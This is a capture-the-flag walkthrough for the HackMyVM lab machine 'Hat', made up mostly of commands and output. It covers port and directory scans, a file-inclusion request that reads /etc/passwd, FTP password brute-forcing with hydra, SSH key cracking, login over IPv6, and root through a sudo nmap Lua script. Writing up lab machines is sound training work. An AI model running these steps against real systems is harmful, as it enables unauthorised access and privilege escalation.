https://hackmyvm.eu/machines/machine.php?vm=Hat
Key points: IPv6
Nmap scan ports.
nmap -sV -sC -p- -Pn -oN ports.log 192.168.56.100
Nmap scan report for deathnote.vuln (192.168.56.100)
Host is up (0.0012s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
65535/tcp open ftp pyftpdlib 1.5.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.56.100:65535
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
Scan port 80.
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.html (Status: 200) [Size: 10701]
/logs (Status: 301) [Size: 315] [--> http://192.168.56.100/logs/]
/php-scripts (Status: 301) [Size: 322] [--> http://192.168.56.100/php-scripts/]
Scan php-scripts, found file.php.
~ gobuster dir -u http://192.168.56.100/php-scripts -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o scripts.log
/index.html (Status: 200) [Size: 7]
/file.php (Status: 200) [Size: 0]
Fuzz the param of file.php.
~ wfuzz -u 'http://192.168.56.100/php-scripts/file.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000713: 200 26 L 38 W 1404 Ch "6"
Get user name.
~ curl 'http://192.168.56.100/php-scripts/file.php?6=/etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
cromiphi:x:1000:1000:cromiphi,,,:/home/cromiphi:/bin/bash
Scan folder logs. Get ftp user name from vsftpd.log
~ gobuster dir -u http://192.168.56.100/logs -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,log -b 401,403,404,500
--wildcard -o logs.log
...
===============================================================
/index.html (Status: 200) [Size: 4]
/vsftpd.log (Status: 200) [Size: 1834]
Bruteforce password of ftp.
~ hydra -l ftp_s3cr3t -P /usr/share/wordlists/rock_ascii.txt -e nsr 192.168.56.100 -s 65535 ftp -t64 -F ...
[65535][ftp] host: 192.168.56.100 login: ftp_s3cr3t password: cowboy
Get 2 files: note and id_rsa.
~ cat note
Hi,
We have successfully secured some of our most critical protocols ... no more worrying!
Sysadmin
Port 22 is filtered. We can not connect it directly, but it is open. So let's try IPV6.
Modify /etc/sysctl.conf to enable IPv6. inet6 means IPv6 is enabled.
~ cat /etc/sysctl.conf
...
net.ipv6.conf.all.disable_ipv6 = 0
net.ipv6.conf.default.disable_ipv6 = 0
net.ipv6.conf.lo.disable_ipv6 = 0
~ ifconfig
...
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.150 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::ff1:d602:48fd:2485 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:35:d5:69 txqueuelen 1000 (Ethernet)
...
Find machines in local link IPv6 network.
~ ping6 -c2 -n -I eth1 ff02::1
ping6: Warning: source address might be selected on device other than: eth1
PING ff02::1(ff02::1) from :: eth1: 56 data bytes
64 bytes from fe80::ff1:d602:48fd:2485%eth1: icmp_seq=1 ttl=64 time=0.033 ms
64 bytes from fe80::a00:27ff:fe17:10a4%eth1: icmp_seq=1 ttl=64 time=0.615 ms
64 bytes from fe80::ff1:d602:48fd:2485%eth1: icmp_seq=2 ttl=64 time=0.049 ms
Test if the machine can be visited from ipv6 address.
~ nmap -p- fe80::a00:27ff:fe17:10a4%eth1 -6
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-13 15:23 CST
Nmap scan report for fe80::a00:27ff:fe17:10a4
Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
~ curl 'http://[fe80::a00:27ff:fe17:10a4%eth1]/index.html'
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Debian Default Page: It works</title>
<style type="text/css" media="screen">
...
Decrypt id_rsa.
$ python2 /usr/share/john/ssh2john.py id_rsa > crack.txt
$ john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
ilovemyself (id_rsa)
1g 0:00:00:11 46.01% (ETA: 20:23:54) 0.09082g/s 607973p/s 607973c/s 607973C/s katim03..katilsimbu_1
Session aborted
Login ssh through ipv6.
~ ssh cromiphi@fe80::a00:27ff:fe17:10a4%eth1 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux Hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth: file /home/cromiphi/.Xauthority does not exist
cromiphi@Hat:~$
Check sudo -l.
cromiphi@Hat:~$ sudo -l
Matching Defaults entries for cromiphi on Hat:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cromiphi may run the following commands on Hat:
(root) NOPASSWD: /usr/bin/nmap
Get root.
cromiphi@Hat:~$ echo 'os.execute("/bin/bash -i")' > exp
cromiphi@Hat:~$ sudo nmap --script=exp
Starting Nmap 7.70 ( https://nmap.org ) at 2021-10-13 10:38 CEST
NSE: Warning: Loading 'exp' -- the recommended file extension is '.nse'.
root@Hat:/home/cromiphi# uid=0(root) gid=0(root) grupos=0(root)
Hat
